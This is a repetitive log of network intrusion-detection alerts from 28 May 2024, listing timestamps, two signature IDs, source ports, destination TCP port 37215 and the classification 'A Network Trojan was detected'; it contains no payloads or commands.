          Timestamp:05/28/24-14:47:55.305906
          SID:2829579
          Source Port:42628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764046
          SID:2829579
          Source Port:57884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755927
          SID:2835222
          Source Port:52798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588811
          SID:2835222
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285876
          SID:2835222
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227077
          SID:2829579
          Source Port:52574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477923
          SID:2829579
          Source Port:52430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565831
          SID:2835222
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855581
          SID:2829579
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493130
          SID:2829579
          Source Port:58296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325782
          SID:2835222
          Source Port:35372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215548
          SID:2829579
          Source Port:34526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797907
          SID:2835222
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878707
          SID:2829579
          Source Port:34982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188119
          SID:2835222
          Source Port:40350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683648
          SID:2835222
          Source Port:52482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271587
          SID:2835222
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797102
          SID:2829579
          Source Port:49344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300243
          SID:2835222
          Source Port:44572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553073
          SID:2835222
          Source Port:49270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138107
          SID:2829579
          Source Port:54002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425082
          SID:2829579
          Source Port:57360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797874
          SID:2829579
          Source Port:50288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177116
          SID:2829579
          Source Port:39922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273542
          SID:2835222
          Source Port:50864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062838
          SID:2835222
          Source Port:43944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068579
          SID:2829579
          Source Port:35498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669514
          SID:2835222
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922557
          SID:2835222
          Source Port:47136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115483
          SID:2829579
          Source Port:34408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229557
          SID:2829579
          Source Port:60856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232742
          SID:2829579
          Source Port:43924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209040
          SID:2835222
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870923
          SID:2829579
          Source Port:53504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190442
          SID:2829579
          Source Port:46658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156454
          SID:2829579
          Source Port:42276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355820
          SID:2835222
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818997
          SID:2829579
          Source Port:60982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472337
          SID:2835222
          Source Port:45924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196725
          SID:2829579
          Source Port:60860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930984
          SID:2829579
          Source Port:59856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114221
          SID:2829579
          Source Port:59184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475443
          SID:2829579
          Source Port:52042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273221
          SID:2829579
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044279
          SID:2835222
          Source Port:49436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105738
          SID:2835222
          Source Port:36164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562866
          SID:2835222
          Source Port:32850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845679
          SID:2835222
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743402
          SID:2835222
          Source Port:45116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239951
          SID:2835222
          Source Port:41676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295254
          SID:2829579
          Source Port:58238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176405
          SID:2835222
          Source Port:55824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941603
          SID:2829579
          Source Port:39370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217107
          SID:2829579
          Source Port:38838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.875940
          SID:2835222
          Source Port:47276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114493
          SID:2829579
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474379
          SID:2835222
          Source Port:55736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317269
          SID:2829579
          Source Port:52314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075881
          SID:2835222
          Source Port:33750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932789
          SID:2835222
          Source Port:40100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325817
          SID:2829579
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793681
          SID:2829579
          Source Port:55796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267565
          SID:2829579
          Source Port:43986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766708
          SID:2835222
          Source Port:59448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160715
          SID:2835222
          Source Port:60106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650671
          SID:2829579
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271392
          SID:2829579
          Source Port:37398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923131
          SID:2835222
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399814
          SID:2829579
          Source Port:52584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196177
          SID:2829579
          Source Port:46102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210188
          SID:2829579
          Source Port:35794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466445
          SID:2835222
          Source Port:48996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437820
          SID:2835222
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147352
          SID:2835222
          Source Port:42166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338068
          SID:2835222
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267193
          SID:2835222
          Source Port:56386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562471
          SID:2829579
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113204
          SID:2829579
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051050
          SID:2835222
          Source Port:33374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196933
          SID:2835222
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322017
          SID:2835222
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711023
          SID:2835222
          Source Port:42440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316988
          SID:2829579
          Source Port:34162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613206
          SID:2835222
          Source Port:54660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337563
          SID:2835222
          Source Port:50538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528989
          SID:2829579
          Source Port:60654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732172
          SID:2829579
          Source Port:48876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738471
          SID:2829579
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156398
          SID:2829579
          Source Port:56854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.165687
          SID:2829579
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160741
          SID:2829579
          Source Port:32922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084802
          SID:2835222
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293871
          SID:2835222
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838766
          SID:2835222
          Source Port:32830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593150
          SID:2829579
          Source Port:53034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.171648
          SID:2835222
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213349
          SID:2829579
          Source Port:48428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841240
          SID:2829579
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211801
          SID:2829579
          Source Port:47642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839608
          SID:2829579
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768550
          SID:2835222
          Source Port:56580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651195
          SID:2829579
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959901
          SID:2829579
          Source Port:40846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480237
          SID:2829579
          Source Port:54042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232770
          SID:2829579
          Source Port:34456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269132
          SID:2835222
          Source Port:43928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652858
          SID:2835222
          Source Port:42696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665367
          SID:2829579
          Source Port:59090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299576
          SID:2829579
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222782
          SID:2835222
          Source Port:40094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216321
          SID:2835222
          Source Port:60254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080600
          SID:2835222
          Source Port:33360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.234760
          SID:2829579
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.618927
          SID:2829579
          Source Port:46170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351087
          SID:2829579
          Source Port:50264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530320
          SID:2835222
          Source Port:52316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807898
          SID:2829579
          Source Port:54758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594328
          SID:2835222
          Source Port:37938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893437
          SID:2835222
          Source Port:35948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207416
          SID:2829579
          Source Port:37952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322824
          SID:2829579
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402433
          SID:2835222
          Source Port:39892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704810
          SID:2835222
          Source Port:41858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739790
          SID:2835222
          Source Port:35858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497022
          SID:2829579
          Source Port:33590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185883
          SID:2835222
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945483
          SID:2835222
          Source Port:44966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651421
          SID:2829579
          Source Port:55100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959777
          SID:2835222
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229425
          SID:2835222
          Source Port:58308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402592
          SID:2835222
          Source Port:40636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591535
          SID:2835222
          Source Port:57850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146377
          SID:2829579
          Source Port:45644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405069
          SID:2835222
          Source Port:44188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590525
          SID:2835222
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221458
          SID:2829579
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591053
          SID:2829579
          Source Port:60506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068468
          SID:2829579
          Source Port:35666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.363483
          SID:2829579
          Source Port:45852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424583
          SID:2835222
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431568
          SID:2835222
          Source Port:49906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154607
          SID:2835222
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985058
          SID:2835222
          Source Port:56924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.079463
          SID:2835222
          Source Port:42194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174028
          SID:2835222
          Source Port:43008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227958
          SID:2835222
          Source Port:37044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090947
          SID:2835222
          Source Port:42836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735781
          SID:2835222
          Source Port:59088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811662
          SID:2829579
          Source Port:52726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.589048
          SID:2829579
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307177
          SID:2835222
          Source Port:53296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923200
          SID:2835222
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840120
          SID:2835222
          Source Port:44810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535518
          SID:2829579
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652992
          SID:2835222
          Source Port:48652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177240
          SID:2835222
          Source Port:41914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680695
          SID:2835222
          Source Port:42814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300251
          SID:2829579
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988935
          SID:2835222
          Source Port:59796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.987861
          SID:2829579
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291713
          SID:2835222
          Source Port:36320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664650
          SID:2835222
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525494
          SID:2835222
          Source Port:34806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711542
          SID:2835222
          Source Port:41792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475453
          SID:2835222
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865368
          SID:2829579
          Source Port:45556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337194
          SID:2829579
          Source Port:48970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953206
          SID:2829579
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484938
          SID:2829579
          Source Port:58548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167583
          SID:2829579
          Source Port:53850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979343
          SID:2835222
          Source Port:35476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711311
          SID:2829579
          Source Port:55874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544071
          SID:2829579
          Source Port:43458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269835
          SID:2835222
          Source Port:38124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299260
          SID:2829579
          Source Port:35426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668061
          SID:2835222
          Source Port:50592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652331
          SID:2829579
          Source Port:36524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650259
          SID:2835222
          Source Port:50848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.038559
          SID:2829579
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206264
          SID:2835222
          Source Port:46478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326794
          SID:2829579
          Source Port:48290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033412
          SID:2835222
          Source Port:39464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.418983
          SID:2835222
          Source Port:48506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889872
          SID:2835222
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214004
          SID:2829579
          Source Port:60114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839830
          SID:2829579
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300073
          SID:2829579
          Source Port:38454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326589
          SID:2835222
          Source Port:49998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878777
          SID:2835222
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147379
          SID:2829579
          Source Port:43022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125723
          SID:2835222
          Source Port:48304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816168
          SID:2835222
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993660
          SID:2835222
          Source Port:36774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978878
          SID:2835222
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046968
          SID:2835222
          Source Port:45066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.069236
          SID:2829579
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.628695
          SID:2835222
          Source Port:44172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738566
